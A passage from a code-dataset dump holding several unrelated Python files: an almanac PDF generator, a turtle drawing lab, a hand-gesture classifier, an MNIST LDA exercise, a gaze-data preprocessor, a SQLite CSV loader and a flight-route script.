lambda x, y: \\\n ((x or \"-无-\") + \"/\" + (y or \"-无-\")).replace(\":\", \"\")\n for day in range(start, end+1):\n retSun.append(merge(\n sundata[day][lat][\"rise\"],\n sundata[day][lat][\"set\"]\n ))\n retCTwi.append(merge(\n ctwidata[day][lat][\"rise\"],\n ctwidata[day][lat][\"set\"]\n ))\n retATwi.append(merge(\n atwidata[day][lat][\"rise\"],\n atwidata[day][lat][\"set\"]\n ))\n retMoon.append(merge(\n moondata[day][\"riseset\"][lat][\"rise\"],\n moondata[day][\"riseset\"][lat][\"set\"]\n ))\n ret.append(retSun)\n ret.append(retCTwi)\n ret.append(retATwi)\n ret.append(retMoon)\n ret.append([\"\"])\n return ret\n \n\n\n\n def save(self, path=\".\"):\n frontname = \"%d-%d-front\" % (self.year, self.month)\n backname = \"%d-%d-back\" % (self.year, self.month)\n open(\n os.path.join(path, frontname + \".svg\"), \"w+\"\n ).write(str(self.front))\n open(\n os.path.join(path, backname + \".svg\"), \"w+\"\n ).write(str(self.back))\n\n run([\n \"rsvg-convert\",\n \"-f\", \"pdf\",\n \"-o\", frontname + \".pdf\",\n frontname + 
\".svg\"\n ])\n \n run([\n \"rsvg-convert\",\n \"-f\", \"pdf\",\n \"-o\", backname + \".pdf\",\n backname + \".svg\"\n ])\n os.unlink(frontname + \".svg\")\n os.unlink(backname + \".svg\")\n\n return (frontname + \".pdf\", backname + \".pdf\")\n\n\n\n\n\n\nif __name__ == \"__main__\":\n YEAR = int(sys.argv[1])\n assert YEAR > 2000 and YEAR < 3000\n filenames = []\n for i in range(1, 13):\n print(\"Generating for %d month %d...\" % (YEAR, i))\n x = MonthGenerator(YEAR, i)\n a, b = x.save()\n filenames.append(a)\n filenames.append(b)\n #break\n\n run([\"pdfunite\"] + filenames + [\"%d.pdf\" % YEAR])\n for f in filenames:\n os.unlink(f)\n","repo_name":"neoatlantis/almanac","sub_path":"monthgen.py","file_name":"monthgen.py","file_ext":"py","file_size_in_byte":18762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"18197384292","text":"# Author: SMR (AMDG) 3/18/22\nimport turtle\n\n# windows\nwindow = turtle.Screen()\n\n# turtle customization propts\nt = turtle.Turtle()\ncolor = window.textinput(\"Color\", \"Enter the turtle color: \")\nt.color(color)\nt.shapesize(window.numinput(\"Size\", \"Enter the turtles size: \"))\n\n# Square function\ndef draw_square():\n t.fillcolor(color)\n t.begin_fill()\n for x in range(4):\n t.right(90)\n t.forward(100)\n t.end_fill()\n\n\n# Clicks\nwindow.onclick(draw_square(), btn=1)\n\nwindow.mainloop()","repo_name":"fp-computer-programming/cycle-14-labs-p22srogers","sub_path":"lab_14-6.py","file_name":"lab_14-6.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7294475358","text":"import cv2\nimport mediapipe as mp\nfrom dotenv import dotenv_values\nimport json\nimport xgboost as xgb\nimport joblib\nfrom scipy.stats import mode\nimport numpy as np\nfrom shifumi.models.train import Train\nconfig = dotenv_values(\".env\")\n\n\nmatching_dict = {0: \"Rock\", 1: \"Paper\", 2: \"Scissor\"}\n\n\nclass handTracker():\n def __init__(self, mode=False, maxHands=2, detectionCon=0.5, modelComplexity=1, trackCon=0.5):\n self.mode = mode\n self.train = Train()\n self.maxHands = maxHands\n self.detectionCon = detectionCon\n self.modelComplex = modelComplexity\n self.trackCon = trackCon\n self.mpHands = mp.solutions.hands\n self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.modelComplex,\n self.detectionCon, self.trackCon)\n self.mpDraw = mp.solutions.drawing_utils\n\n def handsFinder(self, image, draw=True):\n imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imageRGB)\n\n if self.results.multi_hand_landmarks:\n for handLms in self.results.multi_hand_landmarks:\n\n if draw:\n self.mpDraw.draw_landmarks(\n image, handLms, self.mpHands.HAND_CONNECTIONS)\n return image\n\n def positionFinder(self, image, handNo=0, draw=True):\n lmlist = []\n if self.results.multi_hand_landmarks:\n Hand = self.results.multi_hand_landmarks[handNo]\n for id, lm in enumerate(Hand.landmark):\n h, w, c = image.shape\n cx, cy = int(lm.x*w), int(lm.y*h)\n lmlist.append(cx)\n lmlist.append(cy)\n if draw:\n cv2.circle(image, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n\n return lmlist\n\n def get_center(self):\n cap = cv2.VideoCapture(0)\n w = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n h = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n print(h, w)\n\n def get_transform_list(self, lmlist):\n points = self.train.group_points(lmlist)\n centroid = self.train.get_centeroidnp(points)\n new_coordinates = points - centroid\n 
new_coordinates = new_coordinates.flatten()\n return new_coordinates\n\n def gather_data(self, num_samples):\n global rock, paper, scissor\n cap = cv2.VideoCapture(0)\n tracker = handTracker()\n # trigger tells us when to start recording\n trigger = False\n counter = 0\n\n while True:\n success, image = cap.read()\n image = tracker.handsFinder(image)\n lmList = tracker.positionFinder(image)\n if not success:\n break\n if counter == num_samples:\n trigger = not trigger\n counter = 0\n\n if trigger:\n if len(lmList) == 42:\n # Append lm list to the list with the selected class_name\n eval(class_name).append({counter: lmList})\n\n # Increment the counter\n counter += 1\n\n # Text for the counter\n text = \"Collected Samples of {}: {}\".format(\n class_name, counter)\n else:\n text = \"Press 'r' to collect rock samples, 'p' for paper, 's' for scissor and 'n' for nothing\"\n\n # Show the counter on the imaege\n cv2.putText(image, text, (3, 350), cv2.FONT_HERSHEY_SIMPLEX,\n 0.45, (0, 0, 255), 1, cv2.LINE_AA)\n\n cv2.imshow(\"Video\", image)\n k = cv2.waitKey(1)\n if k == ord('r'):\n # Trigger the variable inorder to capture the samples\n trigger = not trigger\n class_name = 'rock'\n rock = []\n if k == ord('p'):\n trigger = not trigger\n class_name = 'paper'\n paper = []\n if k == ord('s'):\n trigger = not trigger\n class_name = 'scissor'\n scissor = []\n if k == ord('x'):\n classes = ['rock', 'paper', 'scissor']\n for class_ in classes:\n file_path = config[\"DATA_HAND\"]\n with open(file_path + f'{class_}.json', 'w') as file:\n json.dump(eval(class_), file)\n print(\"end\")\n\n # Exit if user presses 'q'\n if k == ord('q'):\n break\n\n\ndef main():\n cap = cv2.VideoCapture(0)\n tracker = handTracker()\n model_xgb = joblib.load(config[\"MODEL_PATH\"])\n scaler = joblib.load(config[\"SCALER_PATH\"])\n values = []\n while True:\n success, image = cap.read()\n image = tracker.handsFinder(image)\n lmList = np.array(tracker.positionFinder(image))\n\n if len(lmList) == 42:\n lmList = tracker.get_transform_list(lmList)\n test = scaler.transform(lmList.reshape(1, -1))\n new = model_xgb.predict(test)\n values.append(new)\n\n if len(values) > 10:\n print(matching_dict[int(mode(values, keepdims=False)[0][0])])\n values = []\n\n cv2.imshow(\"Video\", image)\n cv2.waitKey(1)\n\n\nif __name__ == \"__main__\":\n # cap = cv2.VideoCapture(0)\n # tracker = handTracker()\n # tracker.get_center()\n # tracker.gather_data(10000)\n main()\n print(\"end\")\n","repo_name":"thirteenfoil8/shifumi","sub_path":"src/shifumi/pipeline/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32638608833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/11 23:13\n# @File : lda.py\n# @Author : NusLuoKe\n\n'''\nApply LDA to reduce data dimensionality from 784 to 2, 3 and 9. Visualize distribution of the\ndata with dimensionality of 2 and 3 respectively (similar to PCA). Report the classification accuracy\nfor data with dimensions of 2, 3 and 9 respectively, based on nearest neighbor classifier.\nTest the maximal dimensionality that data can be projected to via LDA. 
Explain the reasons.\n'''\nimport numpy as np\nfrom keras.datasets import mnist\nfrom numpy import linalg\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Load MNIST data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nx_train = X_train.reshape(X_train.shape[0], 28 * 28 * 1)\nx_test = X_test.reshape(X_test.shape[0], 28 * 28 * 1)\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n# normalize pixel values to [0, 1]\nx_train = x_train / 255.\nx_test = x_test / 255.\n\n# Get statistical facts\n# Total mean vector\nmu_train = np.sum(x_train, axis=0) / 60000\nmu_test = np.sum(x_test, axis=0) / 10000\n\n# Get the matrix for each class respectively\nimg_0_train, img_1_train, img_2_train, img_3_train, img_4_train, img_5_train, img_6_train, img_7_train, img_8_train, img_9_train = [], [], [], [], [], [], [], [], [], []\nfor i in range(60000):\n if y_train[i] == 0:\n img_0_train.append(x_train[i])\n elif y_train[i] == 1:\n img_1_train.append(x_train[i])\n elif y_train[i] == 2:\n img_2_train.append(x_train[i])\n elif y_train[i] == 3:\n img_3_train.append(x_train[i])\n elif y_train[i] == 4:\n img_4_train.append(x_train[i])\n elif y_train[i] == 5:\n img_5_train.append(x_train[i])\n elif y_train[i] == 6:\n img_6_train.append(x_train[i])\n elif y_train[i] == 7:\n img_7_train.append(x_train[i])\n elif y_train[i] == 8:\n img_8_train.append(x_train[i])\n else:\n img_9_train.append(x_train[i])\n\nimg_0_train = np.array(img_0_train)\nimg_1_train = np.array(img_1_train)\nimg_2_train = np.array(img_2_train)\nimg_3_train = np.array(img_3_train)\nimg_4_train = np.array(img_4_train)\nimg_5_train = np.array(img_5_train)\nimg_6_train = np.array(img_6_train)\nimg_7_train = np.array(img_7_train)\nimg_8_train = np.array(img_8_train)\nimg_9_train = np.array(img_9_train)\n\n# Put all the 10 classes in a list\nimg_train = []\nimg_train.append(img_0_train)\nimg_train.append(img_1_train)\nimg_train.append(img_2_train)\nimg_train.append(img_3_train)\nimg_train.append(img_4_train)\nimg_train.append(img_5_train)\nimg_train.append(img_6_train)\nimg_train.append(img_7_train)\nimg_train.append(img_8_train)\nimg_train.append(img_9_train)\n\n# initialize s_w and s_b\ns_w_train = 0\ns_b_train = 0\n\nfor i in range(10):\n # Class specific mean vector\n mu_i_train = np.mean(img_train[i], axis=0)\n\n # Class - specific covariance(scatter) matrix\n zero_mean_train_classed_train = img_train[i] - mu_i_train\n s_i_train = (1 / img_train[i].shape[0]) * np.matmul(zero_mean_train_classed_train.transpose(),\n zero_mean_train_classed_train)\n # Within - class scatter\n p_i_train = img_train[i].shape[0] / 60000\n s_w_i_train = p_i_train * s_i_train\n s_w_train += s_w_i_train\n\n # Between - class scatter\n mu_temp_train_ = mu_i_train - mu_train\n mu_temp_train = mu_temp_train_.reshape(784, 1)\n s_b_i_train = np.matmul(mu_temp_train, mu_temp_train.transpose()) * p_i_train\n s_b_train += s_b_i_train\n\n# calculate inv(s_w)*s_b\ntemp = np.matmul(np.linalg.pinv(s_w_train), s_b_train)\n\n# # Get eigenvalue and eigenvector of the covariance matrix\neig_val_train, eig_vect_train = linalg.eig(np.mat(temp))\n\n# Sort the eigenvalue from largest to smallest\nsorted_eig_val_train = np.argsort(eig_val_train)[::-1]\n\n# @@@@@@@@@@@@@@@@@@@@ N=2 start@@@@@@@@@@@@@@@@@@@@@@@\nn2_eig_val_train_index = sorted_eig_val_train[0:2] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn2_eig_vect_train = 
eig_vect_train[:, n2_eig_val_train_index]\nx2_train = np.matmul(x_train, n2_eig_vect_train)\nx2_test = np.matmul(x_test, n2_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x2_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x2_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 2, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=2 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=3 start@@@@@@@@@@@@@@@@@@@@@@@\nn3_eig_val_train_index = sorted_eig_val_train[0:3] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn3_eig_vect_train = eig_vect_train[:, n3_eig_val_train_index]\nx3_train = np.matmul(x_train, n3_eig_vect_train)\nx3_test = np.matmul(x_test, n3_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x3_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x3_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 3, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=3 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n\n# @@@@@@@@@@@@@@@@@@@@ N=9 start@@@@@@@@@@@@@@@@@@@@@@@\nn9_eig_val_train_index = sorted_eig_val_train[0:9] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn9_eig_vect_train = eig_vect_train[:, n9_eig_val_train_index]\nx9_train = np.matmul(x_train, n9_eig_vect_train)\nx9_test = np.matmul(x_test, n9_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x9_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x9_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 9, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=9 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=10 start@@@@@@@@@@@@@@@@@@@@@@@\nn10_eig_val_train_index = sorted_eig_val_train[0:10] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn10_eig_vect_train = eig_vect_train[:, n10_eig_val_train_index]\nx10_train = np.matmul(x_train, n10_eig_vect_train)\nx10_test = np.matmul(x_test, n10_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x10_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x10_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 10, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=10 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=11 start@@@@@@@@@@@@@@@@@@@@@@@\nn11_eig_val_train_index = sorted_eig_val_train[0:11] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn11_eig_vect_train = eig_vect_train[:, n11_eig_val_train_index]\nx11_train = np.matmul(x_train, n11_eig_vect_train)\nx11_test = np.matmul(x_test, n11_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x11_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x11_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 11, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=11 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n##############################visulize the projection#########################################\nimg_0_train_2d, img_1_train_2d, img_2_train_2d, img_3_train_2d = [], [], [], []\nimg_4_train_2d, img_5_train_2d, img_6_train_2d = [], [], []\nimg_7_train_2d, img_8_train_2d, img_9_train_2d = [], [], 
[]\n\nimg_0_train_3d, img_1_train_3d, img_2_train_3d, img_3_train_3d = [], [], [], []\nimg_4_train_3d, img_5_train_3d, img_6_train_3d = [], [], []\nimg_7_train_3d, img_8_train_3d, img_9_train_3d = [], [], []\nfor i in range(60000):\n if y_train[i] == 0:\n img_0_train_2d.append(x2_train[i])\n img_0_train_3d.append(x3_train[i])\n elif y_train[i] == 1:\n img_1_train_2d.append(x2_train[i])\n img_1_train_3d.append(x3_train[i])\n elif y_train[i] == 2:\n img_2_train_2d.append(x2_train[i])\n img_2_train_3d.append(x3_train[i])\n elif y_train[i] == 3:\n img_3_train_2d.append(x2_train[i])\n img_3_train_3d.append(x3_train[i])\n elif y_train[i] == 4:\n img_4_train_2d.append(x2_train[i])\n img_4_train_3d.append(x3_train[i])\n elif y_train[i] == 5:\n img_5_train_2d.append(x2_train[i])\n img_5_train_3d.append(x3_train[i])\n elif y_train[i] == 6:\n img_6_train_2d.append(x2_train[i])\n img_6_train_3d.append(x3_train[i])\n elif y_train[i] == 7:\n img_7_train_2d.append(x2_train[i])\n img_7_train_3d.append(x3_train[i])\n elif y_train[i] == 8:\n img_8_train_2d.append(x2_train[i])\n img_8_train_3d.append(x3_train[i])\n else:\n img_9_train_2d.append(x2_train[i])\n img_9_train_3d.append(x3_train[i])\n\nimg_0_train_2d_ = np.array(img_0_train_2d)\nimg_1_train_2d_ = np.array(img_1_train_2d)\nimg_2_train_2d_ = np.array(img_2_train_2d)\nimg_3_train_2d_ = np.array(img_3_train_2d)\nimg_4_train_2d_ = np.array(img_4_train_2d)\nimg_5_train_2d_ = np.array(img_5_train_2d)\nimg_6_train_2d_ = np.array(img_6_train_2d)\nimg_7_train_2d_ = np.array(img_7_train_2d)\nimg_8_train_2d_ = np.array(img_8_train_2d)\nimg_9_train_2d_ = np.array(img_9_train_2d)\n\nimg_0_train_2d = img_0_train_2d_.reshape(img_0_train_2d_.shape[0], img_0_train_2d_.shape[2])\nimg_1_train_2d = img_1_train_2d_.reshape(img_1_train_2d_.shape[0], img_1_train_2d_.shape[2])\nimg_2_train_2d = img_2_train_2d_.reshape(img_2_train_2d_.shape[0], img_2_train_2d_.shape[2])\nimg_3_train_2d = img_3_train_2d_.reshape(img_3_train_2d_.shape[0], img_3_train_2d_.shape[2])\nimg_4_train_2d = img_4_train_2d_.reshape(img_4_train_2d_.shape[0], img_4_train_2d_.shape[2])\nimg_5_train_2d = img_5_train_2d_.reshape(img_5_train_2d_.shape[0], img_5_train_2d_.shape[2])\nimg_6_train_2d = img_6_train_2d_.reshape(img_6_train_2d_.shape[0], img_6_train_2d_.shape[2])\nimg_7_train_2d = img_7_train_2d_.reshape(img_7_train_2d_.shape[0], img_7_train_2d_.shape[2])\nimg_8_train_2d = img_8_train_2d_.reshape(img_8_train_2d_.shape[0], img_8_train_2d_.shape[2])\nimg_9_train_2d = img_9_train_2d_.reshape(img_9_train_2d_.shape[0], img_9_train_2d_.shape[2])\n\nimg_0_train_3d_ = np.array(img_0_train_3d)\nimg_1_train_3d_ = np.array(img_1_train_3d)\nimg_2_train_3d_ = np.array(img_2_train_3d)\nimg_3_train_3d_ = np.array(img_3_train_3d)\nimg_4_train_3d_ = np.array(img_4_train_3d)\nimg_5_train_3d_ = np.array(img_5_train_3d)\nimg_6_train_3d_ = np.array(img_6_train_3d)\nimg_7_train_3d_ = np.array(img_7_train_3d)\nimg_8_train_3d_ = np.array(img_8_train_3d)\nimg_9_train_3d_ = np.array(img_9_train_3d)\n\nimg_0_train_3d = img_0_train_3d_.reshape(img_0_train_3d_.shape[0], img_0_train_3d_.shape[2])\nimg_1_train_3d = img_1_train_3d_.reshape(img_1_train_3d_.shape[0], img_1_train_3d_.shape[2])\nimg_2_train_3d = img_2_train_3d_.reshape(img_2_train_3d_.shape[0], img_2_train_3d_.shape[2])\nimg_3_train_3d = img_3_train_3d_.reshape(img_3_train_3d_.shape[0], img_3_train_3d_.shape[2])\nimg_4_train_3d = img_4_train_3d_.reshape(img_4_train_3d_.shape[0], img_4_train_3d_.shape[2])\nimg_5_train_3d = 
img_5_train_3d_.reshape(img_5_train_3d_.shape[0], img_5_train_3d_.shape[2])\nimg_6_train_3d = img_6_train_3d_.reshape(img_6_train_3d_.shape[0], img_6_train_3d_.shape[2])\nimg_7_train_3d = img_7_train_3d_.reshape(img_7_train_3d_.shape[0], img_7_train_3d_.shape[2])\nimg_8_train_3d = img_8_train_3d_.reshape(img_8_train_3d_.shape[0], img_8_train_3d_.shape[2])\nimg_9_train_3d = img_9_train_3d_.reshape(img_9_train_3d_.shape[0], img_9_train_3d_.shape[2])\n\n# plot figure\nplt.figure()\nplt.title(\"the first 3000 projected training data vector in 2d\")\na0 = plt.scatter(img_0_train_2d[0:3000, 0].real, img_0_train_2d[0:3000, 1].real, c='r', marker='.')\na1 = plt.scatter(img_1_train_2d[0:3000, 0].real, img_1_train_2d[0:3000, 1].real, c='g', marker='x')\na2 = plt.scatter(img_2_train_2d[0:3000, 0].real, img_2_train_2d[0:3000, 1].real, c='b', marker='+')\na3 = plt.scatter(img_3_train_2d[0:3000, 0].real, img_3_train_2d[0:3000, 1].real, c='c', marker='.')\na4 = plt.scatter(img_4_train_2d[0:3000, 0].real, img_4_train_2d[0:3000, 1].real, c='m', marker='x')\na5 = plt.scatter(img_5_train_2d[0:3000, 0].real, img_5_train_2d[0:3000, 1].real, c='y', marker='+')\na6 = plt.scatter(img_6_train_2d[0:3000, 0].real, img_6_train_2d[0:3000, 1].real, c='k', marker='.')\na7 = plt.scatter(img_7_train_2d[0:3000, 0].real, img_7_train_2d[0:3000, 1].real, c='orange', marker='x')\na8 = plt.scatter(img_8_train_2d[0:3000, 0].real, img_8_train_2d[0:3000, 1].real, c='indigo', marker='+')\na9 = plt.scatter(img_9_train_2d[0:3000, 0].real, img_9_train_2d[0:3000, 1].real, c='peru', marker='.')\nplt.legend([a0, a1, a2, a3, a4, a5, a6, a7, a8, a9], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n loc='best')\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nplt.title(\"the first 3000 projected training data vector in 3d\")\na0 = ax.scatter(img_0_train_3d[0:3000, 0].real, img_0_train_3d[0:3000, 1].real, img_0_train_3d[0:3000, 2].real, c='r',\n marker='.')\na1 = ax.scatter(img_1_train_3d[0:3000, 0].real, img_1_train_3d[0:3000, 1].real, img_1_train_3d[0:3000, 2].real, c='g',\n marker='+')\na2 = ax.scatter(img_2_train_3d[0:3000, 0].real, img_2_train_3d[0:3000, 1].real, img_2_train_3d[0:3000, 2].real, c='b',\n marker='x')\na3 = ax.scatter(img_3_train_3d[0:3000, 0].real, img_3_train_3d[0:3000, 1].real, img_3_train_3d[0:3000, 2].real, c='c',\n marker='.')\na4 = ax.scatter(img_4_train_3d[0:3000, 0].real, img_4_train_3d[0:3000, 1].real, img_4_train_3d[0:3000, 2].real, c='m',\n marker='+')\na5 = ax.scatter(img_5_train_3d[0:3000, 0].real, img_5_train_3d[0:3000, 1].real, img_5_train_3d[0:3000, 2].real, c='y',\n marker='x')\na6 = ax.scatter(img_6_train_3d[0:3000, 0].real, img_6_train_3d[0:3000, 1].real, img_6_train_3d[0:3000, 2].real, c='k',\n marker='.')\na7 = ax.scatter(img_7_train_3d[0:3000, 0].real, img_7_train_3d[0:3000, 1].real, img_7_train_3d[0:3000, 2].real,\n c='orange', marker='+')\na8 = ax.scatter(img_8_train_3d[0:3000, 0].real, img_8_train_3d[0:3000, 1].real, img_8_train_3d[0:3000, 2].real,\n c='indigo', marker='x')\na9 = ax.scatter(img_9_train_3d[0:3000, 0].real, img_9_train_3d[0:3000, 1].real, img_9_train_3d[0:3000, 2].real,\n c='peru', marker='.')\nplt.legend([a0, a1, a2, a3, a4, a5, a6, a7, a8, a9], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n loc='best')\nplt.show()\n","repo_name":"NusLuoKe/NUS_EE5907","sub_path":"CA2/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} 
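The lda.py record above builds the LDA projection by hand from inv(S_w)·S_b. As a cross-check (an editorial sketch, not a dataset record; it assumes scikit-learn is installed and reuses the sample's x_train, y_train, x_test, y_test), the library implementation reaches the same 9-dimensional projection and makes the sample's closing question concrete: S_b is a weighted sum of 10 rank-one matrices of class-mean deviations that themselves sum to zero, so rank(S_b) <= n_classes - 1 and LDA can project MNIST to at most 9 dimensions.

# Sketch only (assumes scikit-learn; x_train/y_train/x_test/y_test as in lda.py above).
# sklearn rejects n_components > n_classes - 1 = 9 for the same rank reason,
# which is the maximal LDA dimensionality the assignment asks about.
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier

lda = LinearDiscriminantAnalysis(n_components=9)
x9_train_skl = lda.fit_transform(x_train, y_train)  # shape (60000, 9)
x9_test_skl = lda.transform(x_test)                 # shape (10000, 9)

knn = KNeighborsClassifier(n_neighbors=1)
knn.fit(x9_train_skl, y_train)
print("sklearn LDA 9-dim accuracy=%.2f%%" % (knn.score(x9_test_skl, y_test) * 100))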
+{"seq_id":"36558186373","text":"import os\n\nimport cv2 as cv\nimport numpy as np\nimport scipy.io as sio\nimport argparse\n\n\ndef parser_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', type=str, default='res/data/extract/MPIIGaze/Data/Normalized')\n parser.add_argument('--out', type=str, default='res/data/out.npz')\n return parser.parse_args()\n\n\ndef __read_mat(path_mat):\n content = sio.loadmat(path_mat, struct_as_record=False, squeeze_me=True)\n data = content['data']\n return data\n\n\ndef __convert_pose(vect):\n M, _ = cv.Rodrigues(np.array(vect).astype(np.float32))\n vec = M[:, 2]\n phi = np.arctan2(vec[0], vec[2])\n theta = np.arcsin(vec[1])\n return np.array([theta, phi])\n\n\ndef __convert_gaze(vect):\n x, y, z = vect\n phi = np.arctan2(-x, -z)\n theta = np.arcsin(-y)\n return np.array([theta, phi])\n\n\ndef __get_data(path_data):\n images = []\n poses = []\n gazes = []\n\n for patient in os.listdir(path_data):\n full_path_patient = os.path.join(path_data, patient)\n for day_name in os.listdir(full_path_patient):\n full_day_path = os.path.join(full_path_patient, day_name)\n print('Read data from: ', full_day_path)\n\n content = __read_mat(full_day_path)\n\n left_images = content.left.image\n left_poses = content.left.pose\n left_gazes = content.left.gaze\n\n right_images = content.right.image\n right_poses = content.right.pose\n right_gazes = content.right.gaze\n\n if left_images.shape == (36, 60):\n left_images = left_images[np.newaxis, :, :]\n left_gazes = left_gazes[np.newaxis, :]\n left_poses = left_poses[np.newaxis, :]\n\n if right_images.shape == (36, 60):\n right_images = right_images[np.newaxis, :, :]\n right_gazes = right_gazes[np.newaxis, :]\n right_poses = right_poses[np.newaxis, :]\n\n for i in np.arange(0, len(left_gazes), 1):\n\n images.append(left_images[i])\n images.append(right_images[i])\n\n poses.append(__convert_pose(left_poses[i]))\n poses.append(__convert_pose(right_poses[i]))\n\n gazes.append(__convert_gaze(left_gazes[i]))\n gazes.append(__convert_gaze(right_gazes[i]))\n\n return images, poses, gazes\n\n\nargs = parser_args()\nimg, pss, gzs = __get_data(args.data)\nnp.savez(args.out, image=img, pose=pss, gaze=gzs)\n","repo_name":"YOUlfey/mpiigaze-cnn","sub_path":"gaze-preprocess.py","file_name":"gaze-preprocess.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"14507212651","text":"import pandas as pd\nimport csv\n\n\n\nclass DB_Creator_SQLite():\n\n def __init__(self, database):\n self.database = database\n self.conn = self.database.conn\n self.engine = self.database.sqlalchemy_engine()\n\n def load_from_csv(self, csv_path, tablename, columns=None, dtypes=None):\n\n if columns is None:\n with open(csv_path, 'r') as infile:\n reader = csv.DictReader(infile)\n columns = reader.fieldnames[1:]\n\n if dtypes is None: # if no dtypes set, then everything is a string\n dtypes = {k: str for k in columns}\n\n df = pd.read_csv(csv_path, index_col=0, dtype=dtypes)\n\n if 'SMILES' in df.columns: # make SMILES lowercase if necessary\n df.rename(columns={\"SMILES\": \"smiles\"}, inplace=True)\n\n self._data_to_table(df, tablename)\n self._create_index(tablename, 'smiles')\n\n def _data_to_table(self, df, table):\n print(\"data to sqlite..\")\n df.to_sql(table, con=self.engine, index_label='id', if_exists='replace')\n print('done')\n\n def _create_index(self, table, col_for_index):\n cursor = self.conn.cursor()\n cmd = f\"CREATE INDEX 
{table}_idx_{col_for_index} ON {table} ({col_for_index});\"\n cursor.execute(cmd)\n self.conn.commit()\n cursor.close()\n print('done')\n\n\nif __name__ == '__main__':\n db_creator = DB_Creator_SQLite(None)\n #db_creator.load_from_csv('building_blocks_final.csv', 'building_blocks')\n #db_creator.load_from_csv('metabolites_final.csv', 'metabolites')\n\n","repo_name":"willfinnigan/retrobiocat-db","sub_path":"retrobiocat_web/retro/retrosynthesis_engine/mols_and_reactions/sqlite_source_mol/create_sqlitedb.py","file_name":"create_sqlitedb.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8496574371","text":"# Komşuluk matrisi\nadjacency_matrix = [\n # A B C D E\n [0, 0, 1, 0, 1], # A\n [1, 0, 0, 0, 1], # B\n [0, 0, 0, 1, 1], # C\n [0, 1, 0, 0, 1], # D\n [1, 1, 1, 1, 0] # E\n]\n\n# Şehir isimlerini tutan liste\ncities = ['A', 'B', 'C', 'D', 'E']\n\n# Doğrudan uçuşları bulan fonksiyon\ndef find_direct_flights(origin):\n index = cities.index(origin)\n direct_flights = [cities[i] for i in range(len(cities)) if adjacency_matrix[index][i] == 1]\n return direct_flights\n\n# Dolaylı uçuşları bulan yardımcı fonksiyon\ndef find_indirect_flights_helper(current_city, destination, visited, flight_path, flights):\n if current_city == destination:\n flights.append(flight_path)\n return\n\n visited.add(current_city)\n\n for i in range(len(cities)):\n if adjacency_matrix[cities.index(current_city)][i] == 1 and cities[i] not in visited:\n find_indirect_flights_helper(cities[i], destination, visited.copy(), flight_path + [cities[i]], flights)\n\n# Dolaylı uçuşları bulan fonksiyon\ndef find_indirect_flights(origin, destination):\n flights = []\n find_indirect_flights_helper(origin, destination, set(), [origin], flights)\n return flights\n\n# Kullanıcıdan 